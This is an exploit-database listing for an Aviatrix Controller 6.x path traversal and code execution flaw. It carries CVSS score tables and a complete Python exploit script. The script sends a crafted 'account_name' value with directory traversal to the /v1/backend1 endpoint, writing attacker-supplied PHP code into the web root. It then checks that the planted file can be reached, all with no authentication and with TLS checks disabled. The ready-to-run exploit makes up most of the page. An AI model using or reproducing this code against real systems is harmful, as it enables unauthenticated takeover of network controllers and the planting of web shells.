Lucene search

K
zdt0xJoyGhosh1337DAY-ID-36888
HistoryOct 12, 2021 - 12:00 a.m.

Aviatrix Controller 6.x Path Traversal / Code Execution Exploit

2021-10-1200:00:00
0xJoyGhosh
0day.today
307

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""

β–‘β–ˆβ–€β–€β–ˆ β–‘β–ˆβ”€β”€β–‘β–ˆ β–‘β–ˆβ–€β–€β–€ ── β–ˆβ–€β–ˆ β–ˆβ–€β–€β–ˆ β–ˆβ–€β–ˆ β–„β–ˆβ”€ ── β”€β–ˆβ–€β–ˆβ”€ β–ˆβ–€β–€β–ˆ β–„β–€β–€β–„ β–„β–€β–€β–„ β–ˆβ–€β–€β–ˆ
β–‘β–ˆβ”€β”€β”€ β”€β–‘β–ˆβ–‘β–ˆβ”€ β–‘β–ˆβ–€β–€β–€ β–€β–€ ─▄▀ β–ˆβ–„β–€β–ˆ ─▄▀ β”€β–ˆβ”€ β–€β–€ β–ˆβ–„β–„β–ˆβ–„ β–ˆβ–„β–€β–ˆ β–„β–€β–€β–„ β–ˆβ–„β–„β”€ β–ˆβ–„β–€β–ˆ
β–‘β–ˆβ–„β–„β–ˆ ──▀▄▀─ β–‘β–ˆβ–„β–„β–„ ── β–ˆβ–„β–„ β–ˆβ–„β–„β–ˆ β–ˆβ–„β–„ β–„β–ˆβ–„ ── β”€β”€β”€β–ˆβ”€ β–ˆβ–„β–„β–ˆ β–€β–„β–„β–€ β–€β–„β–„β–€ β–ˆβ–„β–„β–ˆ
                            Author : 0xJoyGhosh
                            Org    : System00 Security
                            Twitter: @0xjoyghosh

""")
try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
    parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
    parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
    args = parser.parse_args()
    url =f"{args.url}/v1/backend1"
except TypeError:
    print("Type -h To See all the options")
except():
    exit()
def exploit(url,path,code):
    headers = CaseInsensitiveDict()
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
    resp = requests.post(url, headers=headers, data=data,verify=False)
    stat = requests.get(f"{args.url}/v1/{path}",verify=False)
    if resp.status_code==200:
        if stat.status_code==200:
            print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
            print("")
        else:
            print("[ Exploit successful Creating File Failed ]")
            pass
    else:
        print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')

if args.url is not None:
    if args.code is not None:
        if args.name is not None:
            exploit(url,args.name,args.code)
        else:
            print('Type -h to see help Menu')
    else:
        print('Type -h to see help Menu')
else:
    print('Type -h to see help Menu')

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

Related for 1337DAY-ID-36888